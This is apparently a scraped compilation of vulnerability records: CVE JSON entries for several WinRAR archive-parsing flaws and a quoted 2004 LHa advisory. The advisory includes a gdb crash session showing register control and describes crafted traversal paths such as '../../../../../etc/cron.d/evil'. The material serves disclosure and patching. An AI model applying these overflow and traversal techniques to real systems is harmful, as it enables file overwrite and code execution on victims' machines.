"lang": "en",
"value": "Multiple unspecified vulnerabilities in RARLAB WinRAR before 3.71 have unknown impact and attack vectors related to crafted (1) ACE, (2) ARJ, (3) BZ2, (4) CAB, (5) GZ, (6) LHA, (7) RAR, (8) TAR, or (9) ZIP files, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "29407",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/29407"
},
{
"name": "43439",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/43439"
},
{
"name": "ADV-2008-0916",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2008/0916/references"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html"
},
{
"name": "winrar-archives-code-execution(41251)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41251"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c10/archive/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2008-7144",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple unspecified vulnerabilities in RARLAB WinRAR before 3.71 have unknown impact and attack vectors related to crafted (1) ACE, (2) ARJ, (3) BZ2, (4) CAB, (5) GZ, (6) LHA, (7) RAR, (8) TAR, or (9) ZIP files, as demonstrated by the OUSPG PROTOS GENOME test suite for Archive Formats."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "29407",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/29407"
},
{
"name": "43439",
"refsource": "OSVDB",
"url": "http://osvdb.org/43439"
},
{
"name": "ADV-2008-0916",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2008/0916/references"
},
{
"name": "http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html",
"refsource": "MISC",
"url": "http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html"
},
{
"name": "winrar-archives-code-execution(41251)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41251"
},
{
"name": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c10/archive/",
"refsource": "MISC",
"url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c10/archive/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2008-7144",
"datePublished": "2009-09-01T16:00:00",
"dateReserved": "2009-09-01T00:00:00",
"dateUpdated": "2024-08-07T11:56:14.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-20252
Vulnerability from cvelistv5
Published
2019-02-05 20:00
Modified
2024-09-16 18:24
Severity ?
EPSS score ?
Summary
In WinRAR versions prior to and including 5.60, there is an out-of-bounds write vulnerability during parsing of crafted ACE and RAR archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user.
References
| ▼ | URL | Tags |
|---|---|---|
| https://research.checkpoint.com/extracting-code-execution-from-winrar/ | x_refsource_MISC | |
| http://www.securityfocus.com/bid/106948 | vdb-entry, x_refsource_BID | |
| https://www.win-rar.com/whatsnew.html | x_refsource_MISC |
Impacted products
| ▼ | Vendor | Product |
|---|---|---|
| Check Point Software Technologies Ltd. | WinRAR |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T11:58:19.176Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "106948",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/106948"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.win-rar.com/whatsnew.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WinRAR",
"vendor": "Check Point Software Technologies Ltd.",
"versions": [
{
"status": "affected",
"version": "All versions prior and including 5.60"
}
]
}
],
"datePublic": "2019-02-05T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "In WinRAR versions prior to and including 5.60, there is an out-of-bounds write vulnerability during parsing of crafted ACE and RAR archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-14T17:57:01",
"orgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"shortName": "checkpoint"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "106948",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/106948"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.win-rar.com/whatsnew.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@checkpoint.com",
"DATE_PUBLIC": "2019-02-05T00:00:00",
"ID": "CVE-2018-20252",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "WinRAR",
"version": {
"version_data": [
{
"version_value": "All versions prior and including 5.60"
}
]
}
}
]
},
"vendor_name": "Check Point Software Technologies Ltd."
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In WinRAR versions prior to and including 5.60, there is an out-of-bounds write vulnerability during parsing of crafted ACE and RAR archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-787: Out-of-bounds Write"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://research.checkpoint.com/extracting-code-execution-from-winrar/",
"refsource": "MISC",
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "106948",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/106948"
},
{
"name": "https://www.win-rar.com/whatsnew.html",
"refsource": "MISC",
"url": "https://www.win-rar.com/whatsnew.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"assignerShortName": "checkpoint",
"cveId": "CVE-2018-20252",
"datePublished": "2019-02-05T20:00:00Z",
"dateReserved": "2018-12-19T00:00:00",
"dateUpdated": "2024-09-16T18:24:07.685Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2022-43650
Vulnerability from cvelistv5
Published
2023-03-29 00:00
Modified
2024-08-03 13:40
Severity ?
EPSS score ?
Summary
This vulnerability allows remote attackers to disclose sensitive information on affected installations of RARLAB WinRAR 6.11.0.0. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ZIP files. Crafted data in a ZIP file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-19232.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T13:40:06.225Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-092/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.win-rar.com/singlenewsview.html?\u0026L=0\u0026tx_ttnews%5Btt_news%5D=216\u0026cHash=983dfbcc83fb1b64a5f792891a281709"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WinRAR",
"vendor": "RARLAB",
"versions": [
{
"status": "affected",
"version": "6.11.0.0"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Bakker"
}
],
"descriptions": [
{
"lang": "en",
"value": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of RARLAB WinRAR 6.11.0.0. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ZIP files. Crafted data in a ZIP file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-19232."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 2.5,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-03-29T00:00:00",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"url": "https://www.zerodayinitiative.com/advisories/ZDI-23-092/"
},
{
"url": "https://www.win-rar.com/singlenewsview.html?\u0026L=0\u0026tx_ttnews%5Btt_news%5D=216\u0026cHash=983dfbcc83fb1b64a5f792891a281709"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2022-43650",
"datePublished": "2023-03-29T00:00:00",
"dateReserved": "2022-10-21T00:00:00",
"dateUpdated": "2024-08-03T13:40:06.225Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2006-3912
Vulnerability from cvelistv5
Published
2006-07-28 00:00
Modified
2024-08-07 18:48
Severity ?
EPSS score ?
Summary
Stack-based buffer overflow in the SFX module in WinRAR before 3.60 beta 8 has unspecified vectors and impact.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.osvdb.org/27031 | vdb-entry, x_refsource_OSVDB | |
| https://www.exploit-db.com/exploits/1992 | exploit, x_refsource_EXPLOIT-DB | |
| http://www.rarlabs.com/rarnew.htm | x_refsource_CONFIRM | |
| https://www.exploit-db.com/exploits/1984 | exploit, x_refsource_EXPLOIT-DB | |
| https://www.exploit-db.com/exploits/1985 | exploit, x_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T18:48:39.264Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "27031",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://www.osvdb.org/27031"
},
{
"name": "1992",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/1992"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "1984",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/1984"
},
{
"name": "1985",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/1985"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2006-07-24T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the SFX module in WinRAR before 3.60 beta 8 has unspecified vectors and impact."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-10-18T16:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "27031",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://www.osvdb.org/27031"
},
{
"name": "1992",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/1992"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "1984",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/1984"
},
{
"name": "1985",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/1985"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2006-3912",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in the SFX module in WinRAR before 3.60 beta 8 has unspecified vectors and impact."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "27031",
"refsource": "OSVDB",
"url": "http://www.osvdb.org/27031"
},
{
"name": "1992",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/1992"
},
{
"name": "http://www.rarlabs.com/rarnew.htm",
"refsource": "CONFIRM",
"url": "http://www.rarlabs.com/rarnew.htm"
},
{
"name": "1984",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/1984"
},
{
"name": "1985",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/1985"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2006-3912",
"datePublished": "2006-07-28T00:00:00",
"dateReserved": "2006-07-27T00:00:00",
"dateUpdated": "2024-08-07T18:48:39.264Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-20251
Vulnerability from cvelistv5
Published
2019-02-05 20:00
Modified
2024-09-16 21:04
Severity ?
EPSS score ?
Summary
In WinRAR versions prior to and including 5.61, there is path traversal vulnerability when crafting the filename field of the ACE format. The UNACE module (UNACEV2.dll) creates files and folders as written in the filename field even when WinRAR validator noticed the traversal attempt and requestd to abort the extraction process. the operation is cancelled only after the folders and files were created but prior to them being written, therefore allowing the attacker to create empty files and folders everywhere in the file system.
References
| ▼ | URL | Tags |
|---|---|---|
| https://research.checkpoint.com/extracting-code-execution-from-winrar/ | x_refsource_MISC | |
| http://www.securityfocus.com/bid/106948 | vdb-entry, x_refsource_BID | |
| https://www.win-rar.com/whatsnew.html | x_refsource_MISC |
Impacted products
| ▼ | Vendor | Product |
|---|---|---|
| Check Point Software Technologies Ltd. | WinRAR |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T11:58:19.020Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "106948",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/106948"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.win-rar.com/whatsnew.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "WinRAR",
"vendor": "Check Point Software Technologies Ltd.",
"versions": [
{
"status": "affected",
"version": "All versions prior and including 5.61"
}
]
}
],
"datePublic": "2019-02-05T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability when crafting the filename field of the ACE format. The UNACE module (UNACEV2.dll) creates files and folders as written in the filename field even when WinRAR validator noticed the traversal attempt and requestd to abort the extraction process. the operation is cancelled only after the folders and files were created but prior to them being written, therefore allowing the attacker to create empty files and folders everywhere in the file system."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-693",
"description": "CWE-693: Protection Mechanism Failure",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-14T17:57:01",
"orgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"shortName": "checkpoint"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "106948",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/106948"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.win-rar.com/whatsnew.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@checkpoint.com",
"DATE_PUBLIC": "2019-02-05T00:00:00",
"ID": "CVE-2018-20251",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "WinRAR",
"version": {
"version_data": [
{
"version_value": "All versions prior and including 5.61"
}
]
}
}
]
},
"vendor_name": "Check Point Software Technologies Ltd."
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability when crafting the filename field of the ACE format. The UNACE module (UNACEV2.dll) creates files and folders as written in the filename field even when WinRAR validator noticed the traversal attempt and requestd to abort the extraction process. the operation is cancelled only after the folders and files were created but prior to them being written, therefore allowing the attacker to create empty files and folders everywhere in the file system."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-693: Protection Mechanism Failure"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://research.checkpoint.com/extracting-code-execution-from-winrar/",
"refsource": "MISC",
"url": "https://research.checkpoint.com/extracting-code-execution-from-winrar/"
},
{
"name": "106948",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/106948"
},
{
"name": "https://www.win-rar.com/whatsnew.html",
"refsource": "MISC",
"url": "https://www.win-rar.com/whatsnew.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "897c38be-0345-43cd-b6cf-fe179e0c4f45",
"assignerShortName": "checkpoint",
"cveId": "CVE-2018-20251",
"datePublished": "2019-02-05T20:00:00Z",
"dateReserved": "2018-12-19T00:00:00",
"dateUpdated": "2024-09-16T21:04:19.182Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
var-200408-0140
Vulnerability from variot
Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates.
These vulnerabilities are related to: SA11510 SA19002
Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------
LHa buffer overflows and directory traversal problems
PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal)
- DESCRIPTION *
LHa is a console-based program for packing and unpacking LHarc archives.
It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD.
- OVERVIEW *
LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough.
By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture:
$ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU
Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt
0 0x55555555 in ?? ()
Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $
b) two directory traversal problems
LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil".
- ATTACHED FILES *
I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives.
- TIMELINE *
18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory
// Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/
.
TITLE: Zoo "fullpath()" File Name Handling Buffer Overflow
SECUNIA ADVISORY ID: SA19002
VERIFY ADVISORY: http://secunia.com/advisories/19002/
CRITICAL: Moderately critical
IMPACT: DoS, System access
WHERE:
From remote
SOFTWARE: zoo 2.x http://secunia.com/product/8297/
DESCRIPTION: Jean-S\xe9bastien Guay-Leroux has discovered a vulnerability in zoo, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user's system. This can be exploited to cause a buffer overflow when a specially-crafted ZOO archive containing a file with an overly long file and directory name is processed (e.g. listing archive contents or adding new files to the archive).
The vulnerability has been confirmed in version 2.10. Other versions may also be affected.
SOLUTION: Restrict use to trusted ZOO archives.
PROVIDED AND/OR DISCOVERED BY: Jean-S\xe9bastien Guay-Leroux
ORIGINAL ADVISORY: http://www.guay-leroux.com/projects/zoo-advisory.txt
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
